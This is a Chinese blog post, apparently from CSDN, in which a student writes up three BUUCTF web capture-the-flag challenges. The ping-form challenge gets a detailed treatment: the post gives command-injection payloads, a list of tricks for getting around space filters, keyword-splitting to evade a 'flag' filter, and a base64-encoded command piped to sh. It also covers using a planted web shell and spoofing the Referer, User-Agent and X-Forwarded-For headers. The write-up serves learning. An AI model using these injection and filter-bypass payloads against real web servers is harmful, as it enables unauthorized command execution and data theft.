BUUCTF - web - PingPingPing+Knife+Http

最新推荐文章于 2023-11-18 18:20:47 发布
最新推荐文章于 2023-11-18 18:20:47 发布
阅读量299 收藏 1
点赞数
分类专栏: ctf Writeup 文章标签: 前端 http linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SuichI314/article/details/121111974
版权

文章目录

前言

已经坚持了半个月了,有十多天一直在写杂项,直到学长委婉地告诉我杂项没啥技术性,就流量分析有点用,建议我学pwn,所以这几天我开始做web了
我会一直坚持下去
加油!

PingPingPing

分析

在这里插入图片描述

想到昨天做了一个ping加Linux命令,今天这个也可以试试
?ip=127.0.0.1|ls
在这里插入图片描述

尝试拿flag?ip=127.0.0.1|cat flag.php
在这里插入图片描述

看来空格被禁了,尝试绕过
在这里插入图片描述

换个绕过方法,这里选择先拿index.php?ip=127.0.0.1|cat$IFS$9index.php
在这里插入图片描述

有了,但正则不全,应该可以查看源码
在这里插入图片描述

可以看到绕过了各种符号、空格、bash和flag,而且flag是顺序匹配

构造payload

内联执行:反引号在linux中作为内联执行,执行输出结果

?ip=127.0.0.1|cat$IFS$9`ls`

如此会catls的结果
在这里插入图片描述

的确用这种方法拿到index.php了,但不见flag,应该藏到源码里了
在这里插入图片描述

得到flag{8c34c264-96a1-42c7-b5cf-7af02fd8a862}

其他方法

既然是绕过,就有多种绕过方法
上面提到需要绕过空格,我用了两种绕过方法,以下是绕过空格的整理:

{cat,flag.txt} 
cat$IFS$9flag.txt
cat${IFS}flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
//\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过

回到这个题
看源码得知顺序匹配了flag,那也可以交换flag四个字母的顺序
b=ag.php;a=fl;cat$IFS$9$a$b

还有一种方式可以绕过flag匹配,那就是编码
cat flag.phpbase64加密
原命令为:echo Y2F0IGZsYWcucGhwCg== | base64 -d | sh
用空格绕过法填充空格
echo$IFS$9Y2F0IGZsYWcucGhwCg==$IFS$9|$IFS$9base64$IFS$9-d$IFS$9|$IFS$9sh
总之方法很多,平时练题要多思考,感觉哪个题有意思可以做完后去找找别人写的WP,说不定有新收获

白给的shell

很无聊的一道题
在这里插入图片描述

帮他找菜刀
在这里插入图片描述

打开根目录拿到白给的flag
在这里插入图片描述

得到flag{f663edb8-d17f-4f6a-8845-dfa6ae0ca44a}

Http

在这里插入图片描述

一看到这就知道是套路,直接看源码
在这里插入图片描述
在这里插入图片描述

Repeater

It doesn't come from 'https://Sycsecret.buuoj.cn',那就把referer改成https://Sycsecret.buuoj.cn
在这里插入图片描述

Please use "Syclover" browser,那就把User-Agent改成Syclover
在这里插入图片描述

No!!! you can only read this locally!!!,那就添加X-Forwarded-For: 127.0.0.1
在这里插入图片描述

得到flag{33445841-508a-4a08-872b-52f013612cee}
一道比较基础的web题,可以请教一下烨神的博客

1ta-chi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
云演CTF web题型 ping
cadandme的博客
01-19 1861
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
BUUCTF [GXYCTF2019]Ping Ping Ping easywill
m0_62107966的博客
09-24 644
BUUCTF [GXYCTF2019]Ping Ping Ping easywill`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码。发现有两个文件,一个是flag.php,另一个是index.php。考点:ping命令相关命令执行。过滤了很多东西,包括flag。这里过滤了flag和空格。使用ls命令查询目录。
CTFHub -技能树 命令注入-无过滤
qq_45653588的博客
07-24 1991
0X00 命令注入-无过滤 进入页面后给出的源码,题目要求输入IP地址执行ping命令 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <html> <head> <title>CTF
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2639
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
经典ctf ping题目详解 青少年CTF-WEB-PingMe02
最新发布
m0_73734159的博客
11-18 1009
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1413
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1649
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令不执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
ctf-web-unseping解题思路
m0_73734159的博客
05-13 866
这道题解题的关键就在于PHP序列化。
BUUCTF-Web-命令执行-[GXYCTF2019]Ping Ping Ping
weixin_42566218的博客
03-09 4705
BUUCTF-Web-命令注入-[GXYCTF2019]Ping Ping Ping 题目链接:BUUCTF 类型:命令注入 知识点:命令注入黑名单绕过方法 解题方法:6种 解题过程 0x1.base64绕过 目标使用ip变量进行get传参,通拼接符号";"执行ls命令,发现目标过滤了空格 因为是linux环境,使用分隔符$IFS进行绕过 ?ip=127.0.0.1;命令$IFS$1参数 配合cat查看源码,发现过滤了很多绕过黑名单的关键字符,并且对"flag"名称字符串进行严格的过
nepctf——web知识点小记~
borrrrring的博客
04-08 310
原型链污染 什么是原型? 所有引用类型都有一个__proto__(隐式原型)属性,属性值是一个普通的对象 所有函数都有一个prototype(原型)属性,属性值是一个普通的对象 所有引用类型的__proto__属性指向它构造函数的prototype 什么是原型链? 当访问一个对象的某个属性时,会先在这个对象本身属性上查找,如果没有找到,则会去它的__proto__隐式原型上查找,即它的构造函数的prototype。如果还没有找到就会再在构造函数的prototype的__proto__中查找,这样一层一层
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
[极客大挑战 2019]Http
Braindance
03-04 154
查看源码在"氛围"这两个字上有隐藏的跳转Secret.php。进入以后页面显示 It doesn't come from 'https://www.Sycsecret.com' 提示页面不是来自这个网址,所以在HackBar上加上Referer:https://www.Sycsecret.com。之后又提示 Please use "Syclover" browser 加上User-Agent:Syclover。又提示 No!!! you can only read this locally!!! 加.
[极客大挑战 2019]Http1解题思路
Megumiwind的博客
08-08 3823
1.打开Burp suite输入靶机的网址进行抓包,并把抓到的包发送到repeater(重发器)当中 在重发器中先点击发送查看一下结果的网页源代码。 在源码当中发现在一个html语句,并且是a标签的跳转语句,而跳转的地点是secret.php <a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a> 2.既然是秘密页面,我们当然要进去看一下到底是.
BUUCTF百题刷题总结(一)
qwzf
09-14 2024
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,会认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
每天一道ctf
whisper921的博客
10-28 812
有这样一行代码
BUUCTF [极客大挑战 2019]Http
weixin_44728681的博客
02-24 228
BUUCTF [极客大挑战 2019]Http Referer和x-forwarded-for
2021-03-07
qq_45987641的博客
03-07 322
title: buu1-16 date: 2021-03-07 16:58:29 tags: 二刷buu 坦白说,第一次刷题感觉不是很好,很多东西没吸收,所以二刷,想把之前丢掉的知识捡回来。 [HCTF 2018]WarmUp 两个php文件,hint.php提示flag在ffffllllaaaagggg 代码审计: 白名单,传入值在白名单里, $_page = mb_substr(//mb_substr() 函数返回字符串的一部分 $page, 0,//从0开始截取 mb_strpos($page . .
[极客大挑战 2019]Http1(BUCTF在线评测)
邓霖涛的博客
08-10 2216
得到flag{8d8ea9d6-86ae-4f8d-8f8e-e10d4b1bd9ef}you can only read this locally!浏览器修改不了Referer的值,换工具抓包工具(修改浏览器代理到抓包工具)搜索下看看有没有别的链接,如标签,发现有两处a标签,特别是第二处。按提示修改请求头X-Forwarded-For:localhost。鼠标右键发送到重发器修改Referer的值,测试请求。页面a标签包裹的"氛围"二字,可以点击了。F12调试该页面,跟踪该get网络请求。......
ping容易忽略的10点用法和排查问题技巧
11-05 650
作者:CloudDeveloper 来源:公众号「Linux云计算网络」ping 相信是很多人非常常用的命令,但究竟有多少人把它的动能发挥到最大了呢?今天就来看看你可能会...
buuctf pingpingping
10-07
buuctf pingpingping 是一个CTF比赛中的题目。题目要求通过执行命令来获取flag。根据引用提供的信息,我们知道可以使用ping命令传递参数给ip,并且可以通过使用命令分隔符来执行其他命令。但是题目中对一些常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1ta-chi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值